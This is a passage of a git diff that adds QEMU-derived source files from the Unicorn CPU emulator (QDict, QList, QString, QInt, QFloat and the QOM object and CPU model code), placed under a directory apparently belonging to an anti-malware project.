*qdict_next(const QDict *qdict, const QDictEntry *entry) +{ + QDictEntry *ret; + + ret = QLIST_NEXT(entry, next); + if (!ret) { + unsigned int bucket = tdb_hash(entry->key) % QDICT_BUCKET_MAX; + ret = qdict_next_entry(qdict, bucket + 1); + } + + return ret; +} + +/** + * qdict_clone_shallow(): Clones a given QDict. Its entries are not copied, but + * another reference is added. + */ +QDict *qdict_clone_shallow(const QDict *src) +{ + QDict *dest; + QDictEntry *entry; + int i; + + dest = qdict_new(); + + for (i = 0; i < QDICT_BUCKET_MAX; i++) { + QLIST_FOREACH(entry, &src->table[i], next) { + qobject_incref(entry->value); + qdict_put_obj(dest, entry->key, entry->value); + } + } + + return dest; +} + +/** + * qentry_destroy(): Free all the memory allocated by a QDictEntry + */ +static void qentry_destroy(QDictEntry *e) +{ + assert(e != NULL); + assert(e->key != NULL); + assert(e->value != NULL); + + qobject_decref(e->value); + g_free(e->key); + g_free(e); +} + +/** + * qdict_del(): Delete a 'key:value' pair from the dictionary + * + * This will destroy all data allocated by this entry. + */ +void qdict_del(QDict *qdict, const char *key) +{ + QDictEntry *entry; + + entry = qdict_find(qdict, key, tdb_hash(key) % QDICT_BUCKET_MAX); + if (entry) { + QLIST_REMOVE(entry, next); + qentry_destroy(entry); + qdict->size--; + } +} + +/** + * qdict_destroy_obj(): Free all the memory allocated by a QDict + */ +static void qdict_destroy_obj(QObject *obj) +{ + int i; + QDict *qdict; + + assert(obj != NULL); + qdict = qobject_to_qdict(obj); + + for (i = 0; i < QDICT_BUCKET_MAX; i++) { + QDictEntry *entry = QLIST_FIRST(&qdict->table[i]); + while (entry) { + QDictEntry *tmp = QLIST_NEXT(entry, next); + QLIST_REMOVE(entry, next); + qentry_destroy(entry); + entry = tmp; + } + } + + g_free(qdict); +} + +static void qdict_flatten_qdict(QDict *qdict, QDict *target, + const char *prefix); + +static void qdict_flatten_qlist(QList *qlist, QDict *target, const char *prefix) +{ + QObject *value; + const QListEntry *entry; + char *new_key; + int i; + + /* This function is never called with prefix == NULL, i.e., it is always + * called from within qdict_flatten_q(list|dict)(). Therefore, it does not + * need to remove list entries during the iteration (the whole list will be + * deleted eventually anyway from qdict_flatten_qdict()). */ + assert(prefix); + + entry = qlist_first(qlist); + + for (i = 0; entry; entry = qlist_next(entry), i++) { + value = qlist_entry_obj(entry); + new_key = g_strdup_printf("%s.%i", prefix, i); + + if (qobject_type(value) == QTYPE_QDICT) { + qdict_flatten_qdict(qobject_to_qdict(value), target, new_key); + } else if (qobject_type(value) == QTYPE_QLIST) { + qdict_flatten_qlist(qobject_to_qlist(value), target, new_key); + } else { + /* All other types are moved to the target unchanged. */ + qobject_incref(value); + qdict_put_obj(target, new_key, value); + } + + g_free(new_key); + } +} + +static void qdict_flatten_qdict(QDict *qdict, QDict *target, const char *prefix) +{ + QObject *value; + const QDictEntry *entry, *next; + char *new_key; + bool delete; + + entry = qdict_first(qdict); + + while (entry != NULL) { + + next = qdict_next(qdict, entry); + value = qdict_entry_value(entry); + new_key = NULL; + delete = false; + + if (prefix) { + new_key = g_strdup_printf("%s.%s", prefix, entry->key); + } + + if (qobject_type(value) == QTYPE_QDICT) { + /* Entries of QDicts are processed recursively, the QDict object + * itself disappears. */ + qdict_flatten_qdict(qobject_to_qdict(value), target, + new_key ? new_key : entry->key); + delete = true; + } else if (qobject_type(value) == QTYPE_QLIST) { + qdict_flatten_qlist(qobject_to_qlist(value), target, + new_key ? new_key : entry->key); + delete = true; + } else if (prefix) { + /* All other objects are moved to the target unchanged. */ + qobject_incref(value); + qdict_put_obj(target, new_key, value); + delete = true; + } + + g_free(new_key); + + if (delete) { + qdict_del(qdict, entry->key); + + /* Restart loop after modifying the iterated QDict */ + entry = qdict_first(qdict); + continue; + } + + entry = next; + } +} + +/** + * qdict_flatten(): For each nested QDict with key x, all fields with key y + * are moved to this QDict and their key is renamed to "x.y". For each nested + * QList with key x, the field at index y is moved to this QDict with the key + * "x.y" (i.e., the reverse of what qdict_array_split() does). + * This operation is applied recursively for nested QDicts and QLists. + */ +void qdict_flatten(QDict *qdict) +{ + qdict_flatten_qdict(qdict, qdict, NULL); +} + +/* extract all the src QDict entries starting by start into dst */ +void qdict_extract_subqdict(QDict *src, QDict **dst, const char *start) + +{ + const QDictEntry *entry, *next; + const char *p; + + *dst = qdict_new(); + entry = qdict_first(src); + + while (entry != NULL) { + next = qdict_next(src, entry); + if (strstart(entry->key, start, &p)) { + qobject_incref(entry->value); + qdict_put_obj(*dst, p, entry->value); + qdict_del(src, entry->key); + } + entry = next; + } +} + +static bool qdict_has_prefixed_entries(const QDict *src, const char *start) +{ + const QDictEntry *entry; + + for (entry = qdict_first(src); entry; entry = qdict_next(src, entry)) { + if (strstart(entry->key, start, NULL)) { + return true; + } + } + + return false; +} + +/** + * qdict_array_split(): This function moves array-like elements of a QDict into + * a new QList. Every entry in the original QDict with a key "%u" or one + * prefixed "%u.", where %u designates an unsigned integer starting at 0 and + * incrementally counting up, will be moved to a new QDict at index %u in the + * output QList with the key prefix removed, if that prefix is "%u.". If the + * whole key is just "%u", the whole QObject will be moved unchanged without + * creating a new QDict. The function terminates when there is no entry in the + * QDict with a prefix directly (incrementally) following the last one; it also + * returns if there are both entries with "%u" and "%u." for the same index %u. + * Example: {"0.a": 42, "0.b": 23, "1.x": 0, "4.y": 1, "o.o": 7, "2": 66} + * (or {"1.x": 0, "4.y": 1, "0.a": 42, "o.o": 7, "0.b": 23, "2": 66}) + * => [{"a": 42, "b": 23}, {"x": 0}, 66] + * and {"4.y": 1, "o.o": 7} (remainder of the old QDict) + */ +void qdict_array_split(QDict *src, QList **dst) +{ + unsigned i; + + *dst = qlist_new(); + + for (i = 0; i < UINT_MAX; i++) { + QObject *subqobj; + bool is_subqdict; + QDict *subqdict; + char indexstr[32], prefix[32]; + size_t snprintf_ret; + + snprintf_ret = snprintf(indexstr, 32, "%u", i); + assert(snprintf_ret < 32); + + subqobj = qdict_get(src, indexstr); + + snprintf_ret = snprintf(prefix, 32, "%u.", i); + assert(snprintf_ret < 32); + + is_subqdict = qdict_has_prefixed_entries(src, prefix); + + // There may be either a single subordinate object (named "%u") or + // multiple objects (each with a key prefixed "%u."), but not both. + if (!subqobj == !is_subqdict) { + break; + } + + if (is_subqdict) { + qdict_extract_subqdict(src, &subqdict, prefix); + assert(qdict_size(subqdict) > 0); + } else { + qobject_incref(subqobj); + qdict_del(src, indexstr); + } + + qlist_append_obj(*dst, (subqobj!=NULL) ? subqobj : QOBJECT(subqdict)); + } +} + +/** + * qdict_join(): Absorb the src QDict into the dest QDict, that is, move all + * elements from src to dest. + * + * If an element from src has a key already present in dest, it will not be + * moved unless overwrite is true. + * + * If overwrite is true, the conflicting values in dest will be discarded and + * replaced by the corresponding values from src. + * + * Therefore, with overwrite being true, the src QDict will always be empty when + * this function returns. If overwrite is false, the src QDict will be empty + * iff there were no conflicts. + */ +void qdict_join(QDict *dest, QDict *src, bool overwrite) +{ + const QDictEntry *entry, *next; + + entry = qdict_first(src); + while (entry) { + next = qdict_next(src, entry); + + if (overwrite || !qdict_haskey(dest, entry->key)) { + qobject_incref(entry->value); + qdict_put_obj(dest, entry->key, entry->value); + qdict_del(src, entry->key); + } + + entry = next; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qerror.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qerror.c new file mode 100644 index 0000000..5589854 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qerror.c @@ -0,0 +1,39 @@ +/* + * QError Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qjson.h" +#include "qapi/qmp/qerror.h" +#include "qemu-common.h" + + +/** + * qerror_human(): Format QError data into human-readable string. + */ +QString *qerror_human(const QError *qerror) +{ + return qstring_from_str(qerror->err_msg); +} + +void qerror_report(ErrorClass eclass, const char *fmt, ...) +{ +} + +/* Evil... */ +struct Error +{ + char *msg; + ErrorClass err_class; +}; + +void qerror_report_err(Error *err) +{ +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qfloat.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qfloat.c new file mode 100644 index 0000000..d6d4d3a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qfloat.c @@ -0,0 +1,68 @@ +/* + * QFloat Module + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/qmp/qfloat.h" +#include "qapi/qmp/qobject.h" +#include "qemu-common.h" + +static void qfloat_destroy_obj(QObject *obj); + +static const QType qfloat_type = { + QTYPE_QFLOAT, + qfloat_destroy_obj, +}; + +/** + * qfloat_from_int(): Create a new QFloat from a float + * + * Return strong reference. + */ +QFloat *qfloat_from_double(double value) +{ + QFloat *qf; + + qf = g_malloc(sizeof(*qf)); + qf->value = value; + QOBJECT_INIT(qf, &qfloat_type); + + return qf; +} + +/** + * qfloat_get_double(): Get the stored float + */ +double qfloat_get_double(const QFloat *qf) +{ + return qf->value; +} + +/** + * qobject_to_qfloat(): Convert a QObject into a QFloat + */ +QFloat *qobject_to_qfloat(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QFLOAT) + return NULL; + + return container_of(obj, QFloat, base); +} + +/** + * qfloat_destroy_obj(): Free all memory allocated by a + * QFloat object + */ +static void qfloat_destroy_obj(QObject *obj) +{ + assert(obj != NULL); + g_free(qobject_to_qfloat(obj)); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qint.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qint.c new file mode 100644 index 0000000..e285d13 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qint.c @@ -0,0 +1,67 @@ +/* + * QInt Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qint.h" +#include "qapi/qmp/qobject.h" +#include "qemu-common.h" + +static void qint_destroy_obj(QObject *obj); + +static const QType qint_type = { + QTYPE_QINT, + qint_destroy_obj, +}; + +/** + * qint_from_int(): Create a new QInt from an int64_t + * + * Return strong reference. + */ +QInt *qint_from_int(int64_t value) +{ + QInt *qi; + + qi = g_malloc(sizeof(*qi)); + qi->value = value; + QOBJECT_INIT(qi, &qint_type); + + return qi; +} + +/** + * qint_get_int(): Get the stored integer + */ +int64_t qint_get_int(const QInt *qi) +{ + return qi->value; +} + +/** + * qobject_to_qint(): Convert a QObject into a QInt + */ +QInt *qobject_to_qint(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QINT) + return NULL; + + return container_of(obj, QInt, base); +} + +/** + * qint_destroy_obj(): Free all memory allocated by a + * QInt object + */ +static void qint_destroy_obj(QObject *obj) +{ + assert(obj != NULL); + g_free(qobject_to_qint(obj)); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qlist.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qlist.c new file mode 100644 index 0000000..60ce805 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qlist.c @@ -0,0 +1,170 @@ +/* + * QList Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qlist.h" +#include "qapi/qmp/qobject.h" +#include "qemu/queue.h" +#include "qemu-common.h" + +static void qlist_destroy_obj(QObject *obj); + +static const QType qlist_type = { + QTYPE_QLIST, + qlist_destroy_obj, +}; + +/** + * qlist_new(): Create a new QList + * + * Return strong reference. + */ +QList *qlist_new(void) +{ + QList *qlist; + + qlist = g_malloc(sizeof(*qlist)); + QTAILQ_INIT(&qlist->head); + QOBJECT_INIT(qlist, &qlist_type); + + return qlist; +} + +static void qlist_copy_elem(QObject *obj, void *opaque) +{ + QList *dst = opaque; + + qobject_incref(obj); + qlist_append_obj(dst, obj); +} + +QList *qlist_copy(QList *src) +{ + QList *dst = qlist_new(); + + qlist_iter(src, qlist_copy_elem, dst); + + return dst; +} + +/** + * qlist_append_obj(): Append an QObject into QList + * + * NOTE: ownership of 'value' is transferred to the QList + */ +void qlist_append_obj(QList *qlist, QObject *value) +{ + QListEntry *entry; + + entry = g_malloc(sizeof(*entry)); + entry->value = value; + + QTAILQ_INSERT_TAIL(&qlist->head, entry, next); +} + +/** + * qlist_iter(): Iterate over all the list's stored values. + * + * This function allows the user to provide an iterator, which will be + * called for each stored value in the list. + */ +void qlist_iter(const QList *qlist, + void (*iter)(QObject *obj, void *opaque), void *opaque) +{ + QListEntry *entry; + + QTAILQ_FOREACH(entry, &qlist->head, next) + iter(entry->value, opaque); +} + +QObject *qlist_pop(QList *qlist) +{ + QListEntry *entry; + QObject *ret; + + if (qlist == NULL || QTAILQ_EMPTY(&qlist->head)) { + return NULL; + } + + entry = QTAILQ_FIRST(&qlist->head); + QTAILQ_REMOVE(&qlist->head, entry, next); + + ret = entry->value; + g_free(entry); + + return ret; +} + +QObject *qlist_peek(QList *qlist) +{ + QListEntry *entry; + QObject *ret; + + if (qlist == NULL || QTAILQ_EMPTY(&qlist->head)) { + return NULL; + } + + entry = QTAILQ_FIRST(&qlist->head); + + ret = entry->value; + + return ret; +} + +int qlist_empty(const QList *qlist) +{ + return QTAILQ_EMPTY(&qlist->head); +} + +static void qlist_size_iter(QObject *obj, void *opaque) +{ + size_t *count = opaque; + (*count)++; +} + +size_t qlist_size(const QList *qlist) +{ + size_t count = 0; + qlist_iter(qlist, qlist_size_iter, &count); + return count; +} + +/** + * qobject_to_qlist(): Convert a QObject into a QList + */ +QList *qobject_to_qlist(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QLIST) { + return NULL; + } + + return container_of(obj, QList, base); +} + +/** + * qlist_destroy_obj(): Free all the memory allocated by a QList + */ +static void qlist_destroy_obj(QObject *obj) +{ + QList *qlist; + QListEntry *entry, *next_entry; + + assert(obj != NULL); + qlist = qobject_to_qlist(obj); + + QTAILQ_FOREACH_SAFE(entry, &qlist->head, next, next_entry) { + QTAILQ_REMOVE(&qlist->head, entry, next); + qobject_decref(entry->value); + g_free(entry); + } + + g_free(qlist); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qstring.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qstring.c new file mode 100644 index 0000000..542810a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qstring.c @@ -0,0 +1,149 @@ +/* + * QString Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qstring.h" +#include "qemu-common.h" + +static void qstring_destroy_obj(QObject *obj); + +static const QType qstring_type = { + QTYPE_QSTRING, + qstring_destroy_obj, +}; + +/** + * qstring_new(): Create a new empty QString + * + * Return strong reference. + */ +QString *qstring_new(void) +{ + return qstring_from_str(""); +} + +/** + * qstring_get_length(): Get the length of a QString + */ +size_t qstring_get_length(const QString *qstring) +{ + return qstring->length; +} + +/** + * qstring_from_substr(): Create a new QString from a C string substring + * + * Return string reference + */ +QString *qstring_from_substr(const char *str, int start, int end) +{ + QString *qstring; + + qstring = g_malloc(sizeof(*qstring)); + + qstring->length = end - start + 1; + qstring->capacity = qstring->length; + + qstring->string = g_malloc(qstring->capacity + 1); + memcpy(qstring->string, str + start, qstring->length); + qstring->string[qstring->length] = 0; + + QOBJECT_INIT(qstring, &qstring_type); + + return qstring; +} + +/** + * qstring_from_str(): Create a new QString from a regular C string + * + * Return strong reference. + */ +QString *qstring_from_str(const char *str) +{ + return qstring_from_substr(str, 0, strlen(str) - 1); +} + +static void capacity_increase(QString *qstring, size_t len) +{ + if (qstring->capacity < (qstring->length + len)) { + qstring->capacity += len; + qstring->capacity *= 2; /* use exponential growth */ + + qstring->string = g_realloc(qstring->string, qstring->capacity + 1); + } +} + +/* qstring_append(): Append a C string to a QString + */ +void qstring_append(QString *qstring, const char *str) +{ + size_t len = strlen(str); + + capacity_increase(qstring, len); + memcpy(qstring->string + qstring->length, str, len); + qstring->length += len; + qstring->string[qstring->length] = 0; +} + +void qstring_append_int(QString *qstring, int64_t value) +{ + char num[32]; + + snprintf(num, sizeof(num), "%" PRId64, value); + qstring_append(qstring, num); +} + +/** + * qstring_append_chr(): Append a C char to a QString + */ +void qstring_append_chr(QString *qstring, int c) +{ + capacity_increase(qstring, 1); + qstring->string[qstring->length++] = c; + qstring->string[qstring->length] = 0; +} + +/** + * qobject_to_qstring(): Convert a QObject to a QString + */ +QString *qobject_to_qstring(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QSTRING) + return NULL; + + return container_of(obj, QString, base); +} + +/** + * qstring_get_str(): Return a pointer to the stored string + * + * NOTE: Should be used with caution, if the object is deallocated + * this pointer becomes invalid. + */ +const char *qstring_get_str(const QString *qstring) +{ + return qstring->string; +} + +/** + * qstring_destroy_obj(): Free all memory allocated by a QString + * object + */ +static void qstring_destroy_obj(QObject *obj) +{ + QString *qs; + + assert(obj != NULL); + qs = qobject_to_qstring(obj); + g_free(qs->string); + g_free(qs); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/Makefile.objs new file mode 100644 index 0000000..6a93ac7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/Makefile.objs @@ -0,0 +1,2 @@ +common-obj-y = object.o container.o qom-qobject.o +common-obj-y += cpu.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/container.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/container.c new file mode 100644 index 0000000..e0e18f7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/container.c @@ -0,0 +1,50 @@ +/* + * Device Container + * + * Copyright IBM, Corp. 2012 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ + +#include "qom/object.h" +#include "qemu/module.h" +#include + +static const TypeInfo container_info = { + "container", + TYPE_OBJECT, + 0, + sizeof(Object), +}; + +void container_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &container_info); +} + +Object *container_get(struct uc_struct *uc, Object *root, const char *path) +{ + Object *obj, *child; + gchar **parts; + int i; + + parts = g_strsplit(path, "/", 0); + assert(parts != NULL && parts[0] != NULL && !parts[0][0]); + obj = root; + + for (i = 1; parts[i] != NULL; i++, obj = child) { + child = object_resolve_path_component(uc, obj, parts[i]); + if (!child) { + child = object_new(uc, "container"); + object_property_add_child(obj, parts[i], child, NULL); + } + } + + g_strfreev(parts); + + return obj; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/cpu.c new file mode 100644 index 0000000..2c3a193 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/cpu.c @@ -0,0 +1,284 @@ +/* + * QEMU CPU model + * + * Copyright (c) 2012-2014 SUSE LINUX Products GmbH + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + */ + +#include "qemu-common.h" +#include "qemu/log.h" +#include "uc_priv.h" + +bool cpu_exists(struct uc_struct* uc, int64_t id) +{ + CPUState *cpu = uc->cpu; + CPUClass *cc = CPU_GET_CLASS(uc, cpu); + + if (cc->get_arch_id(cpu) == id) { + return true; + } + return false; +} + +CPUState *cpu_generic_init(struct uc_struct *uc, const char *typename, const char *cpu_model) +{ + char *str, *name, *featurestr; + CPUState *cpu; + ObjectClass *oc; + CPUClass *cc; + Error *err = NULL; + + str = g_strdup(cpu_model); + name = strtok(str, ","); + + oc = cpu_class_by_name(uc, typename, name); + if (oc == NULL) { + g_free(str); + return NULL; + } + + cpu = CPU(object_new(uc, object_class_get_name(oc))); + cc = CPU_GET_CLASS(uc, cpu); + + featurestr = strtok(NULL, ","); + cc->parse_features(cpu, featurestr, &err); + g_free(str); + if (err != NULL) { + goto out; + } + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", &err); + +out: + if (err != NULL) { + error_free(err); + object_unref(uc, OBJECT(cpu)); + return NULL; + } + + return cpu; +} + +bool cpu_paging_enabled(const CPUState *cpu) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + return cc->get_paging_enabled(cpu); +} + +static bool cpu_common_get_paging_enabled(const CPUState *cpu) +{ + return false; +} + +void cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list, + Error **errp) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + cc->get_memory_mapping(cpu, list, errp); +} + +static void cpu_common_get_memory_mapping(CPUState *cpu, + MemoryMappingList *list, + Error **errp) +{ + error_setg(errp, "Obtaining memory mappings is unsupported on this CPU."); +} + +void cpu_reset_interrupt(CPUState *cpu, int mask) +{ + cpu->interrupt_request &= ~mask; +} + +void cpu_exit(CPUState *cpu) +{ + cpu->exit_request = 1; + cpu->tcg_exit_req = 1; +} + +static void cpu_common_noop(CPUState *cpu) +{ +} + +static bool cpu_common_exec_interrupt(CPUState *cpu, int int_req) +{ + return false; +} + +void cpu_dump_state(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + if (cc->dump_state) { + cc->dump_state(cpu, f, cpu_fprintf, flags); + } +} + +void cpu_dump_statistics(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + if (cc->dump_statistics) { + cc->dump_statistics(cpu, f, cpu_fprintf, flags); + } +} + +void cpu_reset(CPUState *cpu) +{ + CPUClass *klass = CPU_GET_CLASS(cpu->uc, cpu); + + if (klass->reset != NULL) { + (*klass->reset)(cpu); + } +} + +static void cpu_common_reset(CPUState *cpu) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + if (qemu_loglevel_mask(CPU_LOG_RESET)) { + qemu_log("CPU Reset (CPU %d)\n", cpu->cpu_index); + log_cpu_state(cpu, cc->reset_dump_flags); + } + + cpu->interrupt_request = 0; + cpu->current_tb = NULL; + cpu->halted = 0; + cpu->mem_io_pc = 0; + cpu->mem_io_vaddr = 0; + cpu->icount_extra = 0; + cpu->icount_decr.u32 = 0; + cpu->can_do_io = 0; + memset(cpu->tb_jmp_cache, 0, TB_JMP_CACHE_SIZE * sizeof(void *)); +} + +static bool cpu_common_has_work(CPUState *cs) +{ + return false; +} + +ObjectClass *cpu_class_by_name(struct uc_struct *uc, const char *typename, const char *cpu_model) +{ + CPUClass *cc = CPU_CLASS(uc, object_class_by_name(uc, typename)); + + return cc->class_by_name(uc, cpu_model); +} + +static ObjectClass *cpu_common_class_by_name(struct uc_struct *uc, const char *cpu_model) +{ + return NULL; +} + +static void cpu_common_parse_features(CPUState *cpu, char *features, + Error **errp) +{ + char *featurestr; /* Single "key=value" string being parsed */ + char *val; + Error *err = NULL; + + featurestr = features ? strtok(features, ",") : NULL; + + while (featurestr) { + val = strchr(featurestr, '='); + if (val) { + *val = 0; + val++; + object_property_parse(cpu->uc, OBJECT(cpu), val, featurestr, &err); + if (err) { + error_propagate(errp, err); + return; + } + } else { + error_setg(errp, "Expected key=value format, found %s.", + featurestr); + return; + } + featurestr = strtok(NULL, ","); + } +} + +static int cpu_common_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + CPUState *cpu = CPU(dev); + + if (dev->hotplugged) { + cpu_resume(cpu); + } + + return 0; +} + +static void cpu_common_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static int64_t cpu_common_get_arch_id(CPUState *cpu) +{ + return cpu->cpu_index; +} + +static void cpu_class_init(struct uc_struct *uc, ObjectClass *klass, void *data) +{ + DeviceClass *dc = DEVICE_CLASS(uc, klass); + CPUClass *k = CPU_CLASS(uc, klass); + + k->class_by_name = cpu_common_class_by_name; + k->parse_features = cpu_common_parse_features; + k->reset = cpu_common_reset; + k->get_arch_id = cpu_common_get_arch_id; + k->has_work = cpu_common_has_work; + k->get_paging_enabled = cpu_common_get_paging_enabled; + k->get_memory_mapping = cpu_common_get_memory_mapping; + k->debug_excp_handler = cpu_common_noop; + k->cpu_exec_enter = cpu_common_noop; + k->cpu_exec_exit = cpu_common_noop; + k->cpu_exec_interrupt = cpu_common_exec_interrupt; + dc->realize = cpu_common_realizefn; + /* + * Reason: CPUs still need special care by board code: wiring up + * IRQs, adding reset handlers, halting non-first CPUs, ... + */ + dc->cannot_instantiate_with_device_add_yet = true; +} + +static const TypeInfo cpu_type_info = { + TYPE_CPU, + TYPE_DEVICE, + + sizeof(CPUClass), + sizeof(CPUState), + NULL, + + cpu_common_initfn, + NULL, + NULL, + + NULL, + + cpu_class_init, + NULL, + NULL, + + true, +}; + +void cpu_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &cpu_type_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/object.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/object.c new file mode 100644 index 0000000..8457c76 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/object.c @@ -0,0 +1,1691 @@ +/* + * QEMU Object Model + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ + +#include "qom/object.h" +#include "qemu-common.h" +#include "qapi/visitor.h" +#include "qapi-visit.h" +#include "qapi/string-input-visitor.h" +#include "qapi/qmp/qerror.h" + +/* TODO: replace QObject with a simpler visitor to avoid a dependency + * of the QOM core on QObject? */ +#include "qom/qom-qobject.h" +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qbool.h" +#include "qapi/qmp/qint.h" +#include "qapi/qmp/qstring.h" + +#include "uc_priv.h" + +#define MAX_INTERFACES 32 + +typedef struct InterfaceImpl InterfaceImpl; +typedef struct TypeImpl TypeImpl; + +struct InterfaceImpl +{ + const char *typename; +}; + +struct TypeImpl +{ + const char *name; + const char *parent; + + size_t class_size; + size_t instance_size; + void *instance_userdata; + + void (*class_init)(struct uc_struct *uc, ObjectClass *klass, void *data); + void (*class_base_init)(ObjectClass *klass, void *data); + void (*class_finalize)(ObjectClass *klass, void *data); + + void *class_data; + + void (*instance_init)(struct uc_struct *uc, Object *obj, void *opaque); + void (*instance_post_init)(struct uc_struct *uc, Object *obj); + void (*instance_finalize)(struct uc_struct *uc, Object *obj, void *opaque); + + bool abstract; + + TypeImpl *parent_type; + ObjectClass *class; + + int num_interfaces; + InterfaceImpl interfaces[MAX_INTERFACES]; +}; + + +static GHashTable *type_table_get(struct uc_struct *uc) +{ + if (uc->type_table == NULL) { + uc->type_table = g_hash_table_new(g_str_hash, g_str_equal); + } + + return uc->type_table; +} + + +static void type_table_add(struct uc_struct *uc, TypeImpl *ti) +{ + assert(!uc->enumerating_types); + g_hash_table_insert(type_table_get(uc), (void *)ti->name, ti); +} + +static TypeImpl *type_table_lookup(struct uc_struct *uc, const char *name) +{ + return g_hash_table_lookup(type_table_get(uc), name); +} + +static TypeImpl *type_new(struct uc_struct *uc, const TypeInfo *info) +{ + TypeImpl *ti = g_malloc0(sizeof(*ti)); + int i; + + g_assert(info->name != NULL); + + if (type_table_lookup(uc, info->name) != NULL) { + fprintf(stderr, "Registering `%s' which already exists\n", info->name); + abort(); + } + + ti->name = g_strdup(info->name); + ti->parent = g_strdup(info->parent); + + ti->class_size = info->class_size; + ti->instance_size = info->instance_size; + + ti->class_init = info->class_init; + ti->class_base_init = info->class_base_init; + ti->class_finalize = info->class_finalize; + ti->class_data = info->class_data; + + ti->instance_userdata = info->instance_userdata; + ti->instance_init = info->instance_init; + ti->instance_post_init = info->instance_post_init; + ti->instance_finalize = info->instance_finalize; + + ti->abstract = info->abstract; + + for (i = 0; info->interfaces && info->interfaces[i].type; i++) { + ti->interfaces[i].typename = g_strdup(info->interfaces[i].type); + } + ti->num_interfaces = i; + + return ti; +} + +static TypeImpl *type_register_internal(struct uc_struct *uc, const TypeInfo *info) +{ + TypeImpl *ti; + ti = type_new(uc, info); + + type_table_add(uc, ti); + return ti; +} + +TypeImpl *type_register(struct uc_struct *uc, const TypeInfo *info) +{ + assert(info->parent); + return type_register_internal(uc, info); +} + +TypeImpl *type_register_static(struct uc_struct *uc, const TypeInfo *info) +{ + return type_register(uc, info); +} + +static TypeImpl *type_get_by_name(struct uc_struct *uc, const char *name) +{ + if (name == NULL) { + return NULL; + } + + return type_table_lookup(uc, name); +} + +static TypeImpl *type_get_parent(struct uc_struct *uc, TypeImpl *type) +{ + if (!type->parent_type && type->parent) { + type->parent_type = type_get_by_name(uc, type->parent); + 